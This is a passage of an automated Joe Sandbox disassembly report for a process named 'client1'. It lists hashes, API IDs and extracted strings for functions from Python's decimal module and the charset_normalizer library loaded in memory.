                                                    • API String ID: 903524036-217463007
                                                    • Opcode ID: 8ad75d919c70f29923dc5d0feda9fa1aff1ccae90574155bf330c4cecec01ce6
                                                    • Instruction ID: 8134840f4c49689f651df6ab4156ed76dc4a9649129e18653ce7feb7d059489c
                                                    • Opcode Fuzzy Hash: 8ad75d919c70f29923dc5d0feda9fa1aff1ccae90574155bf330c4cecec01ce6
                                                    • Instruction Fuzzy Hash: 5832F2F6A0BE1281EA169B76E8902B863A4BF59B94F04C13DCD6D077B4DF3CA4659301
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_$Dict_Format$ItemString$DeallocErrorNextOccurredWith$EqualSliceTuple_Unicode_strchr
                                                    • String ID: %.200s%s missing required argument '%s' (pos %d)$%.200s%s missing required keyword-only argument '%s'$%.200s%s takes %s %d positional argument%s (%zd given)$%.200s%s takes at most %d %sargument%s (%zd given)$%.200s%s takes no positional arguments$'%U' is an invalid keyword argument for %.200s%s$argument for %.200s%s given by name ('%s') and position (%d)$at least$at most$exactly$function$keyword $keywords must be strings$this function
                                                    • API String ID: 3559638176-2999033026
                                                    • Opcode ID: 4d540e1895a9c3ffedcbc81b3114074a3911625cd29c2936832c9cb15c91a01f
                                                    • Instruction ID: 4511fee8e162fcc2eefdfc5832046263043bcf5f75111a88debfbf9624c81947
                                                    • Opcode Fuzzy Hash: 4d540e1895a9c3ffedcbc81b3114074a3911625cd29c2936832c9cb15c91a01f
                                                    • Instruction Fuzzy Hash: 162260B1A0EA8695EB668F36E4802BD73A0FB84B84F548039DE9E43674DF3CE545D700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_$String$CompareLong_OccurredUnicode_With$DeallocLongMem_SizeTuple_$FreeMallocMemorySsize_t__stdio_common_vsprintf
                                                    • String ID: %lli$Inf$NaN$argument must be a sequence of length 3$coefficient must be a tuple of digits$exponent must be an integer$internal error in dec_sequence_as_str$sNaN$sign must be an integer with the value 0 or 1$string argument in the third position must be 'F', 'n' or 'N'
                                                    • API String ID: 3043890741-2922413049
                                                    • Opcode ID: 27c374245cbc951bbb9664482781b91c9a06e90aa74aacb636386183bdd97e19
                                                    • Instruction ID: 77b1dd3bcfe36c75f767c8ba6533047c4592ebb27d617f78aeb3c0bfeef38f42
                                                    • Opcode Fuzzy Hash: 27c374245cbc951bbb9664482781b91c9a06e90aa74aacb636386183bdd97e19
                                                    • Instruction Fuzzy Hash: A7A19FA1A0EA46E1EA278F34D45027B2BE9AF54B95F4441B2DD1E123A1EE3DE447C321
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Err_String$FreeMem_Unicode_$Arg_ContextDecodeParseSizeTupleVar_memmove
                                                    • String ID: 0$O|O$decimal_point$format arg must be str$format specification exceeds internal limits of _decimal$grouping$invalid format string$invalid override dict$optional argument must be a dict$thousands_sep$unexpected error when rounding
                                                    • API String ID: 2652371118-3843118078
                                                    • Opcode ID: 41669f6f088280e2a45deb123ca613d6ccbc35c48b2e744dfb7242da67ea136d
                                                    • Instruction ID: 902fc3da756e49e3e1fa3c5c05a2cb700107849dfb0dbac9691dd47a1818dbee
                                                    • Opcode Fuzzy Hash: 41669f6f088280e2a45deb123ca613d6ccbc35c48b2e744dfb7242da67ea136d
                                                    • Instruction Fuzzy Hash: 3D0294A1A0AA42C1FA568F39D8501BE67A8FB44B94F141172DE5D176A8DF3CE44BCF20
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_$Long_OccurredSsize_t$List_$String$ItemSize
                                                    • String ID: internal error in context_setround$internal error in context_setstatus_list$internal error in context_settraps_list$valid range for Emax is [0, MAX_EMAX]$valid range for Emin is [MIN_EMIN, 0]$valid range for prec is [1, MAX_PREC]$valid values for capitals are 0 or 1$valid values for clamp are 0 or 1$valid values for signals are: [InvalidOperation, FloatOperation, DivisionByZero, Overflow, Underflow, Subnormal, Inexact, Rounded, Clamped]
                                                    • API String ID: 2053550274-3788598963
                                                    • Opcode ID: 11b1f73e564ec631509256df91c7cfde50a0b1643e7355f9badffc7b3b7e2db2
                                                    • Instruction ID: e02843792abc577c7d1ea36b8edf1752b81e4fd914bd8799339cdf50655cbbcd
                                                    • Opcode Fuzzy Hash: 11b1f73e564ec631509256df91c7cfde50a0b1643e7355f9badffc7b3b7e2db2
                                                    • Instruction Fuzzy Hash: FFB14FA1B0B602D2EA568F35E4402776799BF44BA4F1446B6DD2D563E0DE3EE887C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_Vectorcall$ContainsErr_FormatFromLong_MethodNumber_Set_Ssize_tSubtypeType_
                                                    • String ID: bool$feed$set$str$str or None
                                                    • API String ID: 2422131722-82482222
                                                    • Opcode ID: 5e1e687f1311e2cca4dc8f8691661f7225f9f5edac01d59bea97401bbb47080d
                                                    • Instruction ID: 6cc998f4e3139c3551e5d2a548001314b8fc9d67a2be30829c97b95ab7e1b20a
                                                    • Opcode Fuzzy Hash: 5e1e687f1311e2cca4dc8f8691661f7225f9f5edac01d59bea97401bbb47080d
                                                    • Instruction Fuzzy Hash: C9E15DF1A0BA1385EA229F76E8912BD27A1EF45B94F44C439DE7E077B5DE2DE4408301
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_$Vectorcall$CompareContainsErr_FormatFromLong_MethodNumber_RichSet_Ssize_tSubtypeType_
                                                    • String ID: bool$feed$set
                                                    • API String ID: 588643045-561237756
                                                    • Opcode ID: ffce80187a2194d36b121a22c23bc03d64daf0a46aa4c609272156cc88328f9b
                                                    • Instruction ID: df2245f1c8259c7ec688d791951c7b998571d1f9793b18802eab94f6b6a0e2b6
                                                    • Opcode Fuzzy Hash: ffce80187a2194d36b121a22c23bc03d64daf0a46aa4c609272156cc88328f9b
                                                    • Instruction Fuzzy Hash: E7C109B1A0BA0381FA629B3AE89527D67A1AF55BC4F48C139DE3D077B5DF2CE4408351
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Long_$From$Err_Long$ContextMemoryObject_PackSsize_tStringTuple_Var_memmove
                                                    • String ID: cannot convert Infinity to integer ratio$cannot convert NaN to integer ratio
                                                    • API String ID: 1408862507-4268672173
                                                    • Opcode ID: 2468196f3f44b967afc3cb20012d2157185b627e75dc1f7666c23227b6620d06
                                                    • Instruction ID: d77058fb3c2d1829783cca2daa46c4a1701f6b97ca1f4d4ef0e933b483b0b62b
                                                    • Opcode Fuzzy Hash: 2468196f3f44b967afc3cb20012d2157185b627e75dc1f7666c23227b6620d06
                                                    • Instruction Fuzzy Hash: 49817EA1A0BA46C1EA578F39DD1417D6ADCAF45FD5F0814B2CD0E067A0EF2DE44B8720
                                                    APIs
                                                    • memmove.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA70AA0C
                                                    • memmove.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA70AA1A
                                                    • memmove.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA70AA28
                                                    • PyMem_Free.PYTHON311(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA70AA99
                                                    • PyMem_Free.PYTHON311(?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A,?,?,00000000,?), ref: 00007FFBAA70AAA7
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA715E87
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A,?,?,00000000,?), ref: 00007FFBAA715EAC
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A,?,?,00000000,?), ref: 00007FFBAA715EC4
                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A,?,?,00000000,?), ref: 00007FFBAA715ED2
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A,?,?,00000000,?), ref: 00007FFBAA715ED8
                                                    • memmove.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA715F44
                                                    • memmove.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA715F67
                                                    • memset.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA715F85
                                                    • memmove.VCRUNTIME140(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA715FD1
                                                    • PyMem_Free.PYTHON311(?,00000000,?,00007FFBAA717546,?,?,?,?,?,?,00000000,00000000,00000000,?,?,00007FFBAA717D0A), ref: 00007FFBAA716005
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: memmove$FreeMem___acrt_iob_func$abortfputcmemset
                                                    • String ID: %s:%d: error: $D:\a\1\s\Modules\_decimal\libmpdec\typearith.h$add_size_t(): overflow: check the context
                                                    • API String ID: 503873940-2766838800
                                                    • Opcode ID: bfc3c8d07391a6e6435fd712bf0b6596c4b327f7071a65179aed5de038bbeebc
                                                    • Instruction ID: 7a888d841ef9812b41936bcb24d8a215b4eafd2ae15ae57cb0b3701abd8e31f7
                                                    • Opcode Fuzzy Hash: bfc3c8d07391a6e6435fd712bf0b6596c4b327f7071a65179aed5de038bbeebc
                                                    • Instruction Fuzzy Hash: 6271DFD0B0B646D1F9269E32DA153BB5A8D6F44BD0F4480B6DD0D1BBE5EE3CE4478260
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: strchr
                                                    • String ID: %$Empty keyword parameter name$Empty parameter name after $$Invalid format string ($ before |)$Invalid format string ($ specified twice)$Invalid format string (@ specified twice)$Invalid format string (@ without preceding | and $)$Invalid format string (| specified twice)$More keyword list entries (%d) than format specifiers (%d)$more argument specifiers than keyword list entries (remaining format:'%s')
                                                    • API String ID: 2830005266-262724644
                                                    • Opcode ID: 874ca092438a5339a713435a94bdedbb5f91fb948e3034079ecccedfb0d9badf
                                                    • Instruction ID: 640e1ab74408eb7d9846d7da64703752ad65b69110f96aee4f2e456ac0df7cf4
                                                    • Opcode Fuzzy Hash: 874ca092438a5339a713435a94bdedbb5f91fb948e3034079ecccedfb0d9badf
                                                    • Instruction Fuzzy Hash: 3F9172B1B0AA4692EF168B35E59013C67E4FB48B94F548139DE6D47BB8DF3CE8519300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Err_FromLong_Ssize_t$CompareObject_Rich$BoolChainCode_DivideEmptyExceptionsFetchFormatFrame_Number_State_SubtypeThreadTrueType_
                                                    • String ID: __init__$bool$charset_normalizer.md.UnprintablePlugin$float$ratio
                                                    • API String ID: 101880591-3017791607
                                                    • Opcode ID: f45d2e226ab84ee4ec68ee4e9d3a8a90ebdaaf3c3f0194e72e8c17f4830e412a
                                                    • Instruction ID: 718ac35456d2fa6f8a3db53df1ddeba4908628f02aa391f4bc7178058775b711
                                                    • Opcode Fuzzy Hash: f45d2e226ab84ee4ec68ee4e9d3a8a90ebdaaf3c3f0194e72e8c17f4830e412a
                                                    • Instruction Fuzzy Hash: 188159A1A0BA4281FB669B36E99427D23A0EF45BA4F08C535DD7E077F5DF2CE4418340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FreeMem_$__acrt_iob_func$fputc
                                                    • String ID: %s:%d: warning: $D:\a\1\s\Modules\_decimal\libmpdec\mpdecimal.c$libmpdec: internal error in _mpd_base_ndivmod: please report
                                                    • API String ID: 3941785396-1801843369
                                                    • Opcode ID: f47527f913d2a66f8e896ba17037a917f0ea3313601f2739433dc40459f4e032
                                                    • Instruction ID: c4af8290376719b0a3a1351667b39d466f74986361f27e36e08fd4b06b8089d3
                                                    • Opcode Fuzzy Hash: f47527f913d2a66f8e896ba17037a917f0ea3313601f2739433dc40459f4e032
                                                    • Instruction Fuzzy Hash: 5EC17FB2A0AB45C9E7128F75D4412EE27E9BB44B88F0041B2DE4E177A9DF7CD50AC760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocFromLong_Ssize_t$BoolCompareDivideNumber_Object_RichSubtypeTrueType_
                                                    • String ID: __init__$charset_normalizer.md.CjkInvalidStopPlugin$float$ratio
                                                    • API String ID: 802557476-1911822692
                                                    • Opcode ID: 2f1a14135aac1993272bca4400cba88a50f561f1b04a1fc196391771b24e3b97
                                                    • Instruction ID: 1cedd45f8e47f78c407af068ab7f621b4ce50164b924b55eed2b1440f615486e
                                                    • Opcode Fuzzy Hash: 2f1a14135aac1993272bca4400cba88a50f561f1b04a1fc196391771b24e3b97
                                                    • Instruction Fuzzy Hash: E76151A1A0FA0285FE569B36E89427D63A0AF45BE0F488235DD3E477F6DF2CE4518340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocFreeMem_$Object_$AttrErr_MemoryStringmemmove
                                                    • String ID: denominator$exact conversion for comparison failed
                                                    • API String ID: 3610791524-3218595679
                                                    • Opcode ID: 38cdf41f268258beab263b53bbaaa3de93e8eca75f7d5572cb4eb84eafd0fadd
                                                    • Instruction ID: 0d6c1ec94a945421937c53c08db8646e9f6f06ed964d658c2629899dc8a98155
                                                    • Opcode Fuzzy Hash: 38cdf41f268258beab263b53bbaaa3de93e8eca75f7d5572cb4eb84eafd0fadd
                                                    • Instruction Fuzzy Hash: D15191B2A0AB52C5EB12CF35D8542BD27A8BB44F94F0450B1DE4D066A4DF7CE54ACB60
                                                    APIs
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715DA6
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715DCA
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715DE1
                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715DEF
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715DF5
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715DFE
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715E22
                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715E39
                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715E47
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FFBAA70CA35,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA715E4D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: __acrt_iob_func$abortfputc
                                                    • String ID: %s:%d: error: $D:\a\1\s\Modules\_decimal\libmpdec\typearith.h$add_size_t(): overflow: check the context$mul_size_t(): overflow: check the context
                                                    • API String ID: 4224473327-4231770502
                                                    • Opcode ID: bd6d3835cd08eabc742edac99f748093eed2fa89b091dbba296b2b38ce6aef46
                                                    • Instruction ID: 866c3f8d34b5e297dafbde8925d3489b2d01993c6427c532d3ff453778f8d7b6
                                                    • Opcode Fuzzy Hash: bd6d3835cd08eabc742edac99f748093eed2fa89b091dbba296b2b38ce6aef46
                                                    • Instruction Fuzzy Hash: 1C2146E0B0A606D2EA075F30E8691BF26AABF84790F4041B6DD1E177F5DE2C954BD320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
